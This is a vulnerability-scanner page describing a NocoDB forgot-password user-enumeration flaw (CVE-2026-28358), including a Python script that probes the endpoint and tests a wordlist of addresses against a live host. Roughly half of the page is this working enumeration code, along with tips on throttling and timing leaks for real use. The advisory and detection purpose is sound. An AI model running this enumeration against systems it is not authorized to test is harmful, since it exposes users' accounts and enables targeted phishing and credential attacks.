CVE-2026-28358 Scanner

CVE-2026-28358 Scanner - User Enumeration vulnerability in NocoDB

Short Info

Level: Medium
Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 23 days 23 hours
Scan only one: Domain, Subdomain, IPv4

NocoDB is widely used for creating database solutions with a spreadsheet-like interface, favored in organizations for its ease of managing data. It enables users to collaborate and build data-driven applications without deep technical expertise. The user-friendly environment is popular among non-developers and professionals who require a reliable database solution. Despite its simplicity, it offers flexibility and functionality to handle large datasets. Primarily aimed at small enterprises, it's also utilized by larger organizations seeking quicker project rollouts. Overall, it serves as a valuable tool for managing and manipulating data with minimal complexity.

NocoDB before version 0.301.3 allows attackers to perform user enumeration. By sending candidate addresses to the forgot-password endpoint, a malicious user can determine whether a given email address is registered. That list of confirmed accounts can then be used to craft further targeted attacks against registered users, so user enumeration raises the risk of account-based attacks. The issue highlights the need for uniform handling of user input and responses, so that the server does not disclose which addresses exist. Patching to a fixed version is the primary mitigation.

Technically, the vulnerability resides in the forgot-password functionality of NocoDB: the endpoint returns distinct responses for registered and unregistered email addresses. A probe consists of a POST request carrying a candidate email to the authentication endpoint. An unregistered address receives a response stating that the email is not found, whereas a registered address does not, so the difference alone confirms whether an account exists. Attackers can automate this process against a list of email addresses to identify legitimate accounts. Administrators should treat bursts of forgot-password requests for many distinct addresses as an indicator of this activity.
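The probe described above, as an added example that is not part of the original page or of NocoDB's own code. It assumes the endpoint path `/api/v1/auth/password/forgot` and a JSON body with an `email` field (both assumptions to verify against the target), and it does not rely on NocoDB's exact wording: enumeration is done differentially, comparing each candidate's response against the response for an address that cannot exist. The two stand-in servers at the bottom are constructed to illustrate the vulnerable and the fixed behaviour; their messages are invented.

```python
"""Differential probe for user enumeration through a forgot-password endpoint.

is_vulnerable() sends one address that cannot exist and looks for a response
that admits the address is unknown; enumerate_users() compares every candidate's
response against that impossible-address baseline, so no hard-coded server
strings are needed for the enumeration itself.
"""
import json
import re
import secrets
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Callable, Iterable

# Assumed endpoint path and JSON field; verify against the target's API.
FORGOT_PATH = "/api/v1/auth/password/forgot"

# Heuristic phrases that reveal an address is unknown (assumed, not NocoDB's exact wording).
DISCLOSURE_RE = re.compile(r"not (been )?(found|registered)|does not exist|no (such )?user", re.I)


@dataclass(frozen=True)
class Response:
    status: int
    body: str


Sender = Callable[[str], Response]  # maps a candidate email to the endpoint's response


def http_sender(base_url: str) -> Sender:
    """Build a sender that POSTs {"email": ...} to base_url + FORGOT_PATH."""
    def send(email: str) -> Response:
        req = urllib.request.Request(
            base_url.rstrip("/") + FORGOT_PATH,
            data=json.dumps({"email": email}).encode(),
            headers={"Content-Type": "application/json"},
            method="POST",
        )
        try:
            with urllib.request.urlopen(req, timeout=10) as r:
                return Response(r.status, r.read().decode(errors="replace"))
        except urllib.error.HTTPError as e:  # 4xx/5xx bodies are the interesting ones
            return Response(e.code, e.read().decode(errors="replace"))
    return send


def impossible_address() -> str:
    """Random local part under the reserved .invalid TLD: can never be registered."""
    return f"{secrets.token_hex(8)}@example.invalid"


def fingerprint(r: Response) -> tuple:
    """Normalise a response so that only meaningful differences count."""
    return (r.status, re.sub(r"\s+", " ", r.body).strip().lower())


def is_vulnerable(send: Sender) -> bool:
    """Single-probe check: does the endpoint admit that an unknown address is unknown?"""
    r = send(impossible_address())
    return DISCLOSURE_RE.search(r.body) is not None


def enumerate_users(send: Sender, candidates: Iterable[str]) -> list:
    """Return the candidates whose response differs from the impossible-address baseline."""
    base = fingerprint(send(impossible_address()))
    return [e for e in candidates if fingerprint(send(e)) != base]


# --- Constructed stand-ins for a vulnerable and a fixed server (not NocoDB's code) ---
_USERS = {"alice@example.com", "bob@example.com"}  # constructed user table


def vulnerable_server(email: str) -> Response:
    """Distinct responses for known and unknown addresses: enumerable."""
    if email in _USERS:
        return Response(200, json.dumps({"msg": "Please check your inbox for the reset link"}))
    return Response(400, json.dumps({"msg": "Your email has not been registered"}))


def fixed_server(email: str) -> Response:
    """Uniform response regardless of whether the address exists."""
    return Response(200, json.dumps({"msg": "If that address is registered, a reset link has been sent"}))


if __name__ == "__main__":
    wordlist = ["alice@example.com", "carol@example.com", "bob@example.com"]
    for name, srv in (("vulnerable", vulnerable_server), ("fixed", fixed_server)):
        print(name, "vulnerable:", is_vulnerable(srv), "found:", enumerate_users(srv, wordlist))
    # Against a live host: enumerate_users(http_sender("https://nocodb.example.org"), wordlist)
```

Two caveats for real use: throttle the requests, since a forgot-password endpoint may trigger an email per registered hit and is a natural place for rate limiting, and note that the fingerprint ignores timing, so a server whose bodies are uniform can still leak existence through response latency.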

Exploitation of this vulnerability exposes the organization to account-based attacks. Once attackers have confirmed which accounts exist, they can launch targeted phishing or credential-stuffing and brute-force attacks against them, and unauthorized access to critical applications may follow if the discovered addresses are leveraged efficiently. The disclosure is also a privacy issue in itself, since it reveals who holds an account. A list of confirmed user emails is a stepping stone for larger-scale exploitation; prompt patching of affected systems reduces this risk significantly.
